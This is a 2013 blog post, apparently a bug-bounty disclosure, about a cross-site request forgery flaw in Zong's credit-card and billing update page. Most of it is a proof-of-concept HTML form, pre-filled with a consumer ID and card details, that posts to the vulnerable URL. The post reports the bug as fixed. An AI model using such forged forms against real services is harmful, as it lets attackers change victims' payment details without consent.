Papal service Zong Update Credit Card & Billing Information CSRF

March 12, 2013

Vendor product Brief Information: Zong aim Frictionless Mobile Payments to the world. Zong processing millions of payments a month in over 40 countries worldwide.

CSRF Vulnerable URL: https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink

CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated(OWASP).

POC:

<form action=”https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink” method=”post” name=”manageCreditCardForm” id=”manageCreditCardForm”>
<input type=”hidden” name=”consumer_id” value=”10053353027″ id=”consumer_id”>
<input type=”hidden” name=”is_update” value=”false” id=”is_update”>

<label for=”billing_first_name”>First name </label>

<input type=”text” class=”text required” id=”billing_first_name” name=”billing_first_name” value=”sandeep”>
<label for=”billing_last_name”>Last name</label>
<input type=”text” class=”text required” id=”billing_last_name” name=”billing_last_name” value=”kamble”>
<label for=”billing_card_type”>Card type</label>
<select name=”billing_card_type” class=”select1″ id=”billing_card_type”>
<option value=”Visa”>Visa</option>
<option value=”MasterCard”>MasterCard</option>
<option value=”AmericanExpress”>American Express</option>
<option value=”Discover”>Discover</option>
</select>

<label for=”billing_card_number”>Card number</label>

<input type=”text” class=”text required” id=”billing_card_number” name=”billing_card_number” value=”442411000016″>

<label for=”billing_exp_month”>Expiration date</label>
<select name=”billing_exp_month” class=”select2″ id=”billing_exp_month”>
<option value=”-1″>Month</option>
<option value=”1″>1</option>
<option value=”2″>2</option>
<option value=”3″>3</option>
<option value=”4″>4</option>
<option value=”5″>5</option>
<option value=”6″>6</option>
<option value=”7″>7</option>
<option value=”8″>8</option>
<option value=”9″>9</option>
<option value=”10″>10</option>
<option value=”11″>11</option>
<option value=”12″>12</option>
</select>
<select name=”billing_exp_year” class=”select2″ id=”billing_exp_year”>
<option value=”-1″>Year</option>
<option value=”2013″>2013</option>
<option value=”2014″>2014</option>
<option value=”2015″>2015</option>
<option value=”2016″>2016</option>
<option value=”2017″>2017</option>
<option value=”2018″>2018</option>
<option value=”2019″>2019</option>
<option value=”2020″>2020</option>
<option value=”2021″>2021</option>
<option value=”2022″>2022</option>
<option value=”2023″>2023</option>
</select>

<label for=”billing_cvv”>Security code</label>
<input type=”text” class=”cvv required” id=”billing_cvv” maxlength=”4″ name=”billing_cvv” value=””>
<button type=”submit” id=”_eventId_continue” name=”_eventId_continue” value=”continue” class=”enterBtn”><span>Link Card</span></button>
</form>

 

Thanks PP for such good bounty Program & PP security Team for fixing bug quickly :) .
Special thanks to My G4H Team.

–[S]

We Provide Penetration Testing

Leave a Reply

Your email address will not be published. Required fields are marked *

*




We Provide Penetration Testing